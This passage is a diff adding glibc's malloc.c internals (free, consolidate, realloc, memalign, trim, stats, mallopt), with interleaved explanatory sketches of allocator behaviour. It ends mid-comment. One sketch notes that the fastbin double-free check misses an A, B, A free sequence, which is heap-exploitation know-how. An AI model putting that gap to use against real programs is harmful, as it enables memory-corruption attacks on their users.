+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
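+
+/* Illustrative sketch: the single-threaded fastbin push performed by
+   _int_free above.  Fastbins are LIFO singly linked lists threaded through
+   the chunks' fd fields; the only integrity check on this path is that the
+   chunk being freed is not already sitting at the top of its bin.  The
+   struct below is a stand-in for glibc's malloc_chunk.  */
+#include <stddef.h>
+
+struct ex_chunk
+{
+  size_t prev_size;
+  size_t size;
+  struct ex_chunk *fd;   /* only meaningful while the chunk is free */
+  struct ex_chunk *bk;
+};
+
+static int
+ex_fastbin_push (struct ex_chunk **fb, struct ex_chunk *p)
+{
+  if (*fb == p)
+    return -1;           /* "double free or corruption (fasttop)" */
+  p->fd = *fb;           /* new head points at the old head */
+  *fb = p;               /* bin head now points at p */
+  return 0;
+}
+
+/* Example: pushing A then B leaves the bin as B -> A.  Pushing B again
+   immediately afterwards is caught by the fasttop test, but the sequence
+   A, B, A is not, since only the current top of the bin is compared.  */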
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
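+
+/* Illustrative sketch: the in-place growth decision made by _int_realloc
+   above when the old chunk is too small.  Growing into the top chunk needs
+   enough room to leave a new top of at least MINSIZE behind; growing into a
+   free neighbour only needs the combined size to cover the request, with any
+   excess split off afterwards.  MINSIZE == 32 is an assumption for a 64-bit
+   build.  */
+#include <stddef.h>
+#include <stdbool.h>
+
+static bool
+ex_can_grow_into_top (size_t oldsize, size_t topsize, size_t nb)
+{
+  return oldsize + topsize >= nb + 32;
+}
+
+static bool
+ex_can_absorb_next_free (size_t oldsize, size_t nextsize, size_t nb)
+{
+  return oldsize + nextsize >= nb;
+}
+
+/* Example: a 64-byte chunk followed by a 96-byte free chunk can satisfy an
+   in-place realloc to nb == 144 (64 + 96 >= 144); the 16 spare bytes are
+   too small to split into a MINSIZE chunk, so they are simply absorbed.  */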
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: over-allocate a chunk, find a spot within it that meets the
+     alignment request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    {
+      /* Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.  */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
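+
+/* Illustrative sketch: a simplified version of the aligned-spot computation
+   in _int_memalign above (the real code also steps back by the chunk-header
+   offset via mem2chunk).  Rounding an address up to a power-of-two alignment
+   is done by adding alignment - 1 and masking with -alignment; if the
+   resulting leader would be smaller than MINSIZE (assumed 32 here), the spot
+   is bumped by one more alignment unit so the leader can be handed back to
+   free() as a real chunk.  */
+#include <stdint.h>
+
+static uintptr_t
+ex_aligned_spot (uintptr_t chunk, uintptr_t mem, uintptr_t alignment)
+{
+  uintptr_t spot = (mem + alignment - 1) & -alignment;
+  if (spot - chunk < 32)
+    spot += alignment;
+  return spot;
+}
+
+/* Example: with alignment == 0x1000 and mem == 0x55500010, the spot rounds
+   up to 0x55501000; the leader is nearly a full page, so no bump is
+   needed.  */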
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
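+
+/* Illustrative sketch: the page arithmetic used by mtrim above.  For each
+   free chunk, the first fully unused, page-aligned byte after the chunk
+   header is located, and only whole pages from there to the end of the
+   chunk are given back with MADV_DONTNEED.  The page size and header size
+   are parameters here rather than the GLRO/struct malloc_chunk values used
+   by the real code.  */
+#include <stdint.h>
+#include <stddef.h>
+
+static size_t
+ex_trimmable_bytes (uintptr_t chunk, size_t chunk_size,
+                    size_t header_size, size_t pagesize)
+{
+  uintptr_t psm1 = pagesize - 1;
+  uintptr_t paligned = (chunk + header_size + psm1) & ~psm1;
+  if (chunk + chunk_size <= paligned)
+    return 0;                               /* no whole page inside */
+  size_t usable = chunk + chunk_size - paligned;
+  return usable & ~psm1;                    /* whole pages only */
+}
+
+/* Example: a page-aligned free chunk of exactly three pages yields two
+   whole pages (the first page holds the header and is kept); a chunk
+   smaller than a page never qualifies.  */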
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
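+
+/*
+   Illustrative note (editor's example; the environment-variable syntax is
+   an assumption based on the glibc tunables documentation, not on this
+   file): the setters above back the malloc tunables, so the tcache can be
+   adjusted at program start without code changes, e.g.
+
+     GLIBC_TUNABLES=glibc.malloc.tcache_count=0 ./a.out
+ */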
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
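+
+/*
+   Illustrative usage sketch (editor's example, not from the original
+   sources): __libc_mallopt is reached through the public mallopt symbol
+   aliased near the end of this file.
+
+     #include <malloc.h>
+
+     int main (void)
+     {
+       mallopt (M_MXFAST, 0);                    // disable fastbins
+       mallopt (M_MMAP_THRESHOLD, 1024 * 1024);  // mmap requests >= 1 MiB
+       return 0;
+     }
+
+   Each call returns 1 on success and 0 if the value is rejected (see the
+   M_MXFAST range check and do_set_mmap_threshold above).
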